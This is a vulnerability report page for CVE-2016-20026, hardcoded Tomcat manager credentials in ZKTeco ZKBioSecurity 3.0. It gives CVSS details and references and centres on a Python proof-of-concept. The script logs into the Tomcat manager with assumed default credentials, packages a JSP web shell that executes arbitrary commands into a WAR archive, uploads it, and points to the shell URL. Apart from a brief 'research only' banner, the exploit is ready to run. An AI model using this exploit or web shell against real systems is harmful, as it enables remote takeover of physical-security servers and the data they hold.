Security Vulnerability Report
CVE-2016-20026 CVSS 9.8 CRITICAL

Published: 2026-03-16 14:17:49
Last Modified: 2026-04-15 14:56:46

Description

ZKTeco ZKBioSecurity 3.0 contains hardcoded credentials in the bundled Apache Tomcat server that allow unauthenticated attackers to access the manager application. Attackers can authenticate with hardcoded credentials stored in tomcat-users.xml to upload malicious WAR archives containing JSP applications and execute arbitrary code with SYSTEM privileges.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ZKTeco ZKBioSecurity 3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import io
import sys
import zipfile

import requests

# CVE-2016-20026 PoC - ZKTeco ZKBioSecurity Hardcoded Credentials RCE
# Target: ZKTeco ZKBioSecurity 3.0 with bundled Apache Tomcat

TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "http://target-server"
TOMCAT_MANAGER_URL = f"{TARGET_HOST}:8080/manager/html/upload"

# Hardcoded credentials typically found in tomcat-users.xml
USERNAME = "admin"
PASSWORD = "admin"


def create_malicious_war():
    """Generate JSP webshell WAR file for exploitation"""
    jsp_shell = '''<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if(cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    BufferedReader br = new BufferedReader(new InputStreamReader(in));
    String line;
    while((line = br.readLine()) != null) {
        out.println(line);
    }
}
%>'''
    war_buffer = io.BytesIO()
    with zipfile.ZipFile(war_buffer, 'w', zipfile.ZIP_DEFLATED) as war:
        war.writestr('shell.jsp', jsp_shell)
    return war_buffer.getvalue()


def exploit():
    """Execute the exploit to upload malicious WAR and gain RCE"""
    session = requests.Session()

    # Step 1: Authenticate with hardcoded credentials
    auth = requests.auth.HTTPBasicAuth(USERNAME, PASSWORD)

    # Step 2: Upload malicious WAR file
    files = {'deployWar': ('malicious.war', create_malicious_war(), 'application/octet-stream')}
    try:
        response = session.post(TOMCAT_MANAGER_URL, auth=auth, files=files, timeout=30)
        if response.status_code == 200:
            print("[+] Successfully uploaded malicious WAR file!")
            print("[+] Access shell at: /shell/shell.jsp?cmd=whoami")
        else:
            print("[-] Exploitation failed - credentials may have been changed")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")


if __name__ == "__main__":
    print("CVE-2016-20026 ZKTeco ZKBioSecurity Exploit")
    exploit()

References

https://cxsecurity.com/issue/WLB-2016080266
https://exchange.xforce.ibmcloud.com/vulnerabilities/116484
https://packetstormsecurity.com/files/138567
https://www.exploit-db.com/exploits/40324/
https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-hardcoded-credentials-remote-code-execution
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php

Record Details (from the NVD JSON record)

Vulnerability Status: Deferred
Weakness: CWE-798
CVSS 3.1 (Primary): 9.8 CRITICAL, exploitability score 3.9, impact score 5.9
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 (Secondary): 9.3 CRITICAL
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X